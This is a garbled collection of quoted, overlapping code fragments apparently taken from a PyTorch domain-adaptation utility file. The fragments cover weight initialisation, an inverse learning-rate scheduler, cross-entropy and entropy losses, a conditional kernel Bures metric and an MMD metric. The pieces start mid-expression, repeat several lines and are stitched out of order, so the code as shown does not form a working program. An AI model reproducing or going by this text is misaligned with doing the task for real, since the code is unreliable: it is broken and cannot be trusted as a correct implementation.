2*torch.mm(fea_t,fea_s.t()) sigma_YsYs =", "0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy to", "/ len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay", "# numerical symmetrize S_s, U_s = B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True) HC_s =", "network parameters.\"\"\" classname = m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm')", "= D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt =", "+\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs =", "= epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= # B_s = I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon)", "in enumerate(data_loader): X, lab = to_var(X), to_var(lab).long().squeeze() _, prob = FC(DNN(X)) plab =", "prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1)", "-\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt", "2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp()", "prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach()", "-*- import torch from torch.autograd import Variable import sys ################################## # Network &", "lab) in enumerate(data_loader): X, lab = to_var(X), to_var(lab).long().squeeze() _, prob = FC(DNN(X)) plab", "-\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs =", "CKB loss def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): # Y:", "learning rate by a factor of 0.1 every lr_decay_epoch epochs.\"\"\" lr = init_lr", "invalid CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #====== Kernel Matrix and Centering", "return CKB_dist # MMD loss def MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0] num_sam_t =", "X, lab = to_var(X), to_var(lab).long().squeeze() _, prob = FC(DNN(X)) plab = prob.data.max(1)[1] correct", "def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return CE_loss # Entropy Loss def Entropy(prob):", "# B_s = I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t -", "else: sys.exit('Error: invalid CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #====== Kernel Matrix", "from torch.autograd import Variable import sys ################################## # Network & Variable ################################## def", "if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') !=", "if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0)", "prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt", "lab) return CE_loss # Entropy Loss def Entropy(prob): num_sam = prob.shape[0] Entropy =", "numerical symmetrize S_s, U_s = B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True) HC_s = H_s.mm(", "num_sam_t = prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t)", "= (B_s + B_s.t())/2 # numerical symmetrize B_t = (B_t + B_t.t())/2 #", "classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias)", "-\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\", "(-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s)", "prob_t): num_sam_s = prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\", "= B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear", "schedule_dict = {\"inv\":inv_lr_scheduler} ################################## # Objective Functions ################################## # Cross-Entropy Loss NLL_loss =", "I_t = torch.eye(num_sam_t).cuda() #====== Kernel Matrix and Centering Matrix ======= H_s = (", "B_s = (B_s + B_s.t())/2 # numerical symmetrize B_t = (B_t + B_t.t())/2", "= ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t())", "B_t = num_sam_t*epsilon*Inv_t B_s = (B_s + B_s.t())/2 # numerical symmetrize B_t =", "'soft': prob_t = prob_t.detach() else: sys.exit('Error: invalid CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t =", "+ R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD loss def MMD_Metric(prob_s, prob_t): num_sam_s", "D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp()", "import torch from torch.autograd import Variable import sys ################################## # Network & Variable", "prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy = correct.item() / len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr,", "= prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t())", "# B_t = I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t =", "= -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB loss def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t,", "======= Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s =", "(G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t", "param_group['lr'] = lr * param_lr[i] param_group['weight_decay'] = weight_decay * 2 i += 1", "K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist = K_XsXs.mean() + K_XtXt.mean() - 2*K_XtXs.mean()", "epsilon=1e-2, CKB_type='soft'): # Y: label, Z: fea, matching conditional distribution P(Z|Y) num_sam_s =", "fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach()", "= (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s", "= {\"inv\":inv_lr_scheduler} ################################## # Objective Functions ################################## # Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda()", "= m.__class__.__name__ if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif", "correct += plab.eq(lab.data).cpu().sum() accuracy = correct.item() / len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr, optimizer,", "R_{s} and R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t +", "numerical symmetrize B_t = (B_t + B_t.t())/2 # numerical symmetrize S_s, U_s =", "= (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist = K_XsXs.mean() + K_XtXt.mean() - 2*K_XtXs.mean() return", "!= -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Conv2d') !=", "torch.no_grad(): correct = 0 for batch_idx, (X, lab) in enumerate(data_loader): X, lab =", "= D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs =", "init_lr * (1 + gamma * iter_num) ** (-power) i = 0 for", "len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning", "= x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct = 0 for batch_idx,", "classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias)", "torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy to variable.\"\"\" if torch.cuda.is_available(): x = x.cuda() return", "Network & Variable ################################## def weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname = m.__class__.__name__ if", "import Variable import sys ################################## # Network & Variable ################################## def weights_init(m): \"\"\"Initialize", "if CKB_type == 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft': prob_t =", "Z: fea, matching conditional distribution P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s", ") HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n =", "G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse()", "return Variable(x) def to_data(x): \"\"\"Convert variable to numpy.\"\"\" if torch.cuda.is_available(): x = x.cpu()", "= to_var(X), to_var(lab).long().squeeze() _, prob = FC(DNN(X)) plab = prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum()", "num_sam_t*epsilon*Inv_t B_s = (B_s + B_s.t())/2 # numerical symmetrize B_t = (B_t +", "- (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s = (B_s", "sys ################################## # Network & Variable ################################## def weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname", "with torch.no_grad(): correct = 0 for batch_idx, (X, lab) in enumerate(data_loader): X, lab", "x = x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct = 0 for", "def to_data(x): \"\"\"Convert variable to numpy.\"\"\" if torch.cuda.is_available(): x = x.cpu() return x.data.numpy()", "Matrix ======= H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = ( torch.eye(num_sam_t)", "======= # B_s = I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t", "and R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse()", "CKB_type == 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft': prob_t = prob_t.detach()", "Functions ################################## # Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4),", "2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1)", "torch.eye(num_sam_t).cuda() #====== Kernel Matrix and Centering Matrix ======= H_s = ( torch.eye(num_sam_s) -", "-1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy to variable.\"\"\" if torch.cuda.is_available(): x =", "Variable import sys ################################## # Network & Variable ################################## def weights_init(m): \"\"\"Initialize network", "Entropy/num_sam # CKB loss def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'):", "(HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n = torch.svd(Nuclear) #====== Conditional KB Distance CKB_dist = R_s.trace()", "= (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt =", "torch from torch.autograd import Variable import sys ################################## # Network & Variable ##################################", "epochs.\"\"\" lr = init_lr * (1 + gamma * iter_num) ** (-power) i", "# Y: label, Z: fea, matching conditional distribution P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t", "plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): # Y: label, Z: fea, matching conditional distribution", "-1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m):", "elif classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight)", "(X, lab) in enumerate(data_loader): X, lab = to_var(X), to_var(lab).long().squeeze() _, prob = FC(DNN(X))", "optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ################################## # Objective Functions ################################## # Cross-Entropy Loss NLL_loss", "by a factor of 0.1 every lr_decay_epoch epochs.\"\"\" lr = init_lr * (1", "# Objective Functions ################################## # Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss", "Objective Functions ################################## # Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss =", "= B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t =", "in optimizer.param_groups: param_group['lr'] = lr * param_lr[i] param_group['weight_decay'] = weight_decay * 2 i", ").cuda() H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1)", "numpy to variable.\"\"\" if torch.cuda.is_available(): x = x.cuda() return Variable(x) def to_data(x): \"\"\"Convert", "correct.item() / len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005):", "{\"inv\":inv_lr_scheduler} ################################## # Objective Functions ################################## # Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda() def", "0 for param_group in optimizer.param_groups: param_group['lr'] = lr * param_lr[i] param_group['weight_decay'] = weight_decay", "(H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t =", "of 0.1 every lr_decay_epoch epochs.\"\"\" lr = init_lr * (1 + gamma *", "D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach()", "################################## # Objective Functions ################################## # Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab):", "K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt", "classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif", "param_lr[i] param_group['weight_decay'] = weight_decay * 2 i += 1 return optimizer schedule_dict =", "def Entropy(prob): num_sam = prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB loss", "torch.svd(Nuclear) #====== Conditional KB Distance CKB_dist = R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return", "= fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard': prob_t", "classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1:", "\"\"\"Convert variable to numpy.\"\"\" if torch.cuda.is_available(): x = x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC):", "classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy to variable.\"\"\" if torch.cuda.is_available():", "= (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist = K_XsXs.mean() + K_XtXt.mean()", "Variable(x) def to_data(x): \"\"\"Convert variable to numpy.\"\"\" if torch.cuda.is_available(): x = x.cpu() return", "\"\"\"Decay learning rate by a factor of 0.1 every lr_decay_epoch epochs.\"\"\" lr =", "if torch.cuda.is_available(): x = x.cuda() return Variable(x) def to_data(x): \"\"\"Convert variable to numpy.\"\"\"", "B_t = I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t", "2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt =", "CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #====== Kernel Matrix and Centering Matrix", "fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs", "Y: label, Z: fea, matching conditional distribution P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t =", "sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt", ").cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1)", "K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys", "= ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda()", ") Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n = torch.svd(Nuclear) #====== Conditional KB Distance", "# numerical symmetrize B_t = (B_t + B_t.t())/2 # numerical symmetrize S_s, U_s", "num_cls, epsilon=1e-2, CKB_type='soft'): # Y: label, Z: fea, matching conditional distribution P(Z|Y) num_sam_s", "prob_t = prob_t.detach() else: sys.exit('Error: invalid CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda()", "(H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s +", "torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft': prob_t", "+\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt =", "= (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs =", "torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #====== Kernel Matrix and Centering Matrix ======= H_s =", "+ G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= # B_s", "# Network & Variable ################################## def weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname = m.__class__.__name__", "distribution P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type", "CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return CE_loss # Entropy Loss def Entropy(prob): num_sam =", "FC(DNN(X)) plab = prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy = correct.item() / len(data_loader.dataset) return", "torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') !=", "= (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s}", "0.02) m.bias.data.fill_(0) elif classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname =", "optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate by a factor of", "iter_num) ** (-power) i = 0 for param_group in optimizer.param_groups: param_group['lr'] = lr", "-\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\", "* (1 + gamma * iter_num) ** (-power) i = 0 for param_group", "################################## # Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab)", "= (B_t + B_t.t())/2 # numerical symmetrize S_s, U_s = B_s.symeig(eigenvectors=True) S_t, U_t", "CKB_type='soft'): # Y: label, Z: fea, matching conditional distribution P(Z|Y) num_sam_s = fea_s.shape[0]", "-\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt", "!= -1 or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight,", "torch.autograd import Variable import sys ################################## # Network & Variable ################################## def weights_init(m):", "D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\", "elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05)", "sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() 